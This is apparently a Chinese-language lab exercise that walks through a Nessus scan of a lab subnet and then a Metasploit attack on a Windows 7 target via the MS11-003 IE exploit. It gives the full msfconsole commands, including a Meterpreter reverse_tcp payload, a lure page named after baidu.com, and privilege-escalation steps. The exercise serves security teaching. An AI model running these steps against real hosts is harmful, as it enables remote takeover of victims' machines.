網安——Metasploit攻擊win7例項
利用Nessus掃描目標主機
執行命令 /etc/init.d/nessusd start 啟動Nessus服務
訪問Nessus控制端https://127.0.0.1:8834/
新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。
配置掃描資訊,主要設定掃描名稱、描述和掃描目標三個資訊即可,其他配置選擇預設,配置完成點選Save。選擇對整個10.1.1.0/24網段進行掃描
掃描結束後,Nessus會很直觀的顯示出目標網段的安全情況。下圖顯示了整個網段的安全資訊。Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關痛癢的資訊顯示問題。
重點關注10.1.1.129主機,即win7靶機,Nessus掃描出該主機存在四個最高危漏洞、2個高危漏洞及其它漏洞問題
選中高危漏洞,Nessus給出了該漏洞的介紹、風險資訊、解決方案等詳細資訊。Risk information對於攻擊者來說非常有用,可以根據Risk information去Google搜尋是否存在已知的漏洞利用Exp。
利用MS11_003 IE漏洞攻擊win7主機
1.在kali中執行“msfconsole”,啟動metasploit
2.執行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP
3.執行命令:show options,檢視配置選項
4.設定生成的惡意網頁的URI為baidu.com
執行命令:set URIPATH baidu.com
5.為防止伺服器埠衝突,設定伺服器埠為8060,避開常用埠8080
執行命令:set SRVPORT 8060
6.設定攻擊負載
執行命令:set PAYLOAD windows/meterpreter/reverse_tcp
7.檢視配置選項
執行命令: show options
8.設定HOST以繫結本地IP
set LHOST 10.1.1.128
9.為避免衝突設定LPORT
執行命令:set LPORT 8866
10.執行令“exploit”開始進行攻擊,生成惡意網頁和做好其他準備,只等受害者訪問我們構造的惡意網頁
11.在 Win7靶機開啟IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點選網頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示資訊表明攻擊成功。
12.驗證攻擊是否成功。列出當前成功建立的回話,任意進入一個回話,檢視攻擊者的身份。可以嘗試使用getsystem進行進一步的提權,如果提權失敗則可以採取上傳提權exe程式進行提權的方案獲得最高許可權。
答題: